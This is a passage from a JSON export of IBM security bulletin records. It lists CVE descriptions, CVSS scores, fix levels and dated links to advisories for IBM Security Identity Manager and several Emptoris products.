[_https://exchange.xforce.ibmcloud.com/vulnerabilities/106368_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106368>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L) \n \n \n**CVEID:** [_CVE-2015-5621_](<https://vulners.com/cve/CVE-2015-5621>)** \nDESCRIPTION:** Net-SNMP is vulnerable to a denial of service, caused by incompletely parsed varBind variables being left in the list of variables by the snmp_pdu_parse() function. A remote attacker could exploit this vulnerability to cause the application to crash or possibly execute arbitrary code on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/105232_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105232>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n \n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Security Identity Manager Virtual Appliance versions 7.0.0.0, 7.0.0.1, 7.0.0.2, 7.0.0.3\n\n## Remediation/Fixes\n\nEnsure that the version listed below is installed on the system. \n\nProduct Version| Fix level \n---|--- \nIBM Security Identity Manager (ISIM) Virtual Appliance releases 7.0.0.0, 7.0.0.1, 7.0.0.2, 7.0.0.3| Apply the following: \nIBM Security Identity Manager (ISIM) 7.0.1 release [7.0.1-ISS-SIM-FP0000](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Tivoli+Identity+Manager&release=7.0.1&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:38:14", "type": "ibm", "title": "Security Bulletin: Fixes for Multiple Security Vulnerabilities in IBM Security Identity Manager Virtual Appliance available", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3565", "CVE-2014-3613", "CVE-2014-3707", "CVE-2014-8121", "CVE-2014-8150", "CVE-2014-9297", "CVE-2014-9298", "CVE-2015-1798", "CVE-2015-1799", "CVE-2015-1819", "CVE-2015-2017", "CVE-2015-2730", "CVE-2015-3143", "CVE-2015-3148", "CVE-2015-3238", "CVE-2015-5621", "CVE-2015-7450"], "modified": "2018-06-16T21:38:14", "id": "9FD738448ACD93F4450A43269B40F6F0A44AE4531A251D9858867B18DD433AE4", "href": "https://www.ibm.com/support/pages/node/273647", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:39", "description": "## Question\n\nSecurity Bulletins for Emptoris Sourcing\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Sourcing.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details.? Please use this information to take the appropriate actions.\n\nIn our effort to serve you better we recommend that you subscribe to this article for notification of future Security Bulletins and advisories posted here. \n \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nMay 11th 2016\n\n * **[Security Bulletin: IBM Emptoris Sourcing is affected by open redirect vulnerability (CVE-2016-0329) ](<http://www.ibm.com/support/docview.wss?uid=swg21982629>)**\n\nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\n \nSeptember 23 2015\n\n * **[Security Bulletin: Information disclosure vulnerability reported in IBM Emptoris Sourcing (CVE-2015-5024)](<http://www-01.ibm.com/support/docview.wss?uid=swg21967255>)**\n\n \nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\n \nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\n \nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n\n?January 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\n?December 31 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n\n?September 17 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244) ](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\nAugust 23 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Emptoris Sourcing Portfolio (CVE-2014-3033 CVE-2014-4790 CVE-2014-3040) ](<http://www-01.ibm.com/support/docview.wss?uid=swg21680665>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYR8W\",\"label\":\"Emptoris Sourcing\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T15:10:02", "type": "ibm", "title": "Security Bulletins for Emptoris Sourcing", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3033", "CVE-2014-3040", "CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-4790", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-5024", "CVE-2015-7450", "CVE-2016-0329", "CVE-2016-3092", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T15:10:02", "id": "B0A606101370774E5FB3E4409A17D910B4B5997971AC7B7045727379D355B696", "href": "https://www.ibm.com/support/pages/node/783533", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:49", "description": "## Question\n\nSecurity Bulletins for Emptoris Services Procurement\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Services Procurement.** \n \nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm\">)\" for details.? Please use this information to take the appropriate actions. \n \nIn our effort to serve you better we recommend that you subscribe to this article for notification of new Security Bulletins and advisories posted here. \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: IBM Emptoris Services Procurement is affected by Information leakage vulnerability (CVE-2017-1547)_**](<http://www-01.ibm.com/support/docview.wss?uid=swg22007770>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n \nJuly 14th 2017?\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22004442>)**\n \nJuly 14th 2017?\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22003479>)**\n \nJune 13th 2017?\n\n * **[Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2016-8919)](<http://www-01.ibm.com/support/docview.wss?uid=swg22004642>)**\n \nJune 13th 2017\n\n * **[Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1121](<http://www.ibm.com/support/docview.wss?uid=swg22004706>)**\n \nJune 12th 2017\n\n * **[Security Bulletin: Vulnerability in IBM Websphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1137)](<http://www.ibm.com/support/docview.wss?uid=swg22004666>)**\n \nJun 12 2017??????\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products. **](<http://www-01.ibm.com/support/docview.wss?uid=swg22004666&myns=swgother&mynp=OCSSYQ72&mynp=OCSSYR6U&mynp=OCSSYQAR&mynp=OCSSYR8W&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYQ72-OCSSYR6U-OCSSYQAR-OCSSYR8W-OCSSYRER-OCSSYQ89-_-E>)\n \n \nJan 18 2017\n\n * **[S](<http://www-01.ibm.com/support/docview.wss?uid=swg21996820>)**[**ecurity Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement** ](<http://www-01.ibm.com/support/docview.wss?uid=swg21996820>)\n \n \nJuly 14 2016\n\n * [**Security Bulletin: A JMX component vulnerability in IBM Java SDK and IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management Suite and IBM Emptoris Services Procurement (CVE-2016-3427)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21986797>)\n \n \nMarch 7 2016\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM WebSphere Application Server affect IBM Emptoris Strategic Supply **](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[Management](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)**[** and IBM Emptoris Services Procurement (CVE-2015-7575 CVE-2016-0466 CVE-2015-7417)?**](<http://www-01.ibm.com/support/docview.wss?uid=swg21978028>)\n \nDecember 15 2015\n\n * [**Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server used with IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2015-4872)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21972272>)\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n \nNovember 06 2015\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.**](<http://www-01.ibm.com/support/docview.wss?uid=swg21969875>)\n \nAugust 26th 2015\n\n * **Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.**\n \nJune 24th 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://emptoris.support.ibmcloud.com/ics/support/default.asp?deptID=31019&task=knowledge&questionID=21574&languageID=>)**\n \nApril 8th 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n?January 27th 2015\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n?January 20th 2015\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Services Procurement (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21694987>)**\nSeptember 17th 2014\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYR6U\",\"label\":\"Emptoris Services Procurement\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T16:15:01", "type": "ibm", "title": "Security Bulletins for Emptoris Services Procurement", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4872", "CVE-2015-7417", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0466", "CVE-2016-3092", "CVE-2016-3427", "CVE-2016-8919", "CVE-2017-1121", "CVE-2017-1137", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501", "CVE-2017-1547"], "modified": "2018-12-08T16:15:01", "id": "7996A5B21090888A5E92985E9AA52C1DFFD5B468A73A1B32557A0A11DFBE0724", "href": "https://www.ibm.com/support/pages/node/783543", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:49", "description": "## Question\n\nSecurity Bulletins for Emptoris Contract Management\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Contract Management.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details.? Please use this information to take the appropriate actions. \n \nWe recommend that you subscribe to this article to receive notification of future Security Bulletins and advisories posted here. \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Detailed error messages in IBM Emptoris Contract Management are vulnerable to attacks (CVE-2016-6018)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005664>)\n\n \nMay 2nd 2016\n\n * **[Security Bulletin: Vulnerability in BeanShell affects IBM Emptoris Strategic Supply Management. (CVE-2016-2510)](<http://www.ibm.com/support/docview.wss?uid=swg21982152&myns=swgother&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYRER-OCSSYQ89-_-E>)**\n\n \nFebruary?1st 2016\n\n * **_[Security Bulletin: Multiple vulnerabilities in IBM Emptoris Contract Management (CVE-2015-5050 CVE-2015-5042 CVE-2015-7398)](<http://www-01.ibm.com/support/docview.wss?uid=swg21973592>)_**\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n \nApril 82015\n\n * **_IBM [Security?Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)_**\n\n[J](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)anuary 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\n? December 31 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n\n?November 13 2014\n\n * **[Security Bulletin: JBoss RestEasy vulnerabilities in IBM Emptoris Contract Management (CVE-2014-3490)](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\n?September 17 2014\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\n?August 23 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Emptoris Contract Management (CVE-2014-3041 CVE-2014-3034 CVE-2014-3040) ](<http://www-01.ibm.com/support/docview.wss?uid=swg21680370>)**\n\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYQ89\",\"label\":\"Emptoris Contract Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T16:15:01", "type": "ibm", "title": "Security Bulletins for Emptoris Contract Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3034", "CVE-2014-3040", "CVE-2014-3041", "CVE-2014-3490", "CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-5042", "CVE-2015-5050", "CVE-2015-7398", "CVE-2015-7450", "CVE-2016-2510", "CVE-2016-3092", "CVE-2016-6018", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T16:15:01", "id": "41A2B080355DFAE7EADFECB4D5D6C7105784D83B969140D731128E3E9EDA0757", "href": "https://www.ibm.com/support/pages/node/783529", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:40:18", "description": "## Question\n\nSecurity Bulletins for Emptoris Strategic Supply Management Platform.\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris?Strategic Supply Management Platform.** \n \nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm\">)\" for details.? Please use this information to take the appropriate actions. \n \nWe recommend that you subscribe to this article to receive notification of future Security Bulletins and advisories posted here.\n\nNovember 6th 2017\n\n * [**_Security Bulletin: IBM Emptoris Strategic Supply Management is affected by a Cross-Site Request Forgery vulnerability (CVE-2017-1097)?_**](<http://www.ibm.com/support/docview.wss?uid=swg22006963>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities addressed in IBM Emptoris Strategic Supply Management (CVE-2016-6021 CVE-2016-6029 CVE-2017-1190)_**](<http://www.ibm.com/support/docview.wss?uid=swg22006799>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n \nJuly 14th 2017?\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22004442>)**\n \nJuly 14th 2017?\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products.](<http://www.ibm.com/support/docview.wss?uid=swg22003479>)**\n \n \nJune 13th 2017?\n\n * **[Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2016-8919)](<http://www-01.ibm.com/support/docview.wss?uid=swg22004642>)**\n \n \nJune 13th 2017\n\n * **[Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement products (CVE-2017-1121](<http://www.ibm.com/support/docview.wss?uid=swg22004706>)**\n \n \nJune 12th 2017\n\n * **[Security Bulletin: Vulnerability in IBM Websphere Application Server affects IBM Emptoris Strategic 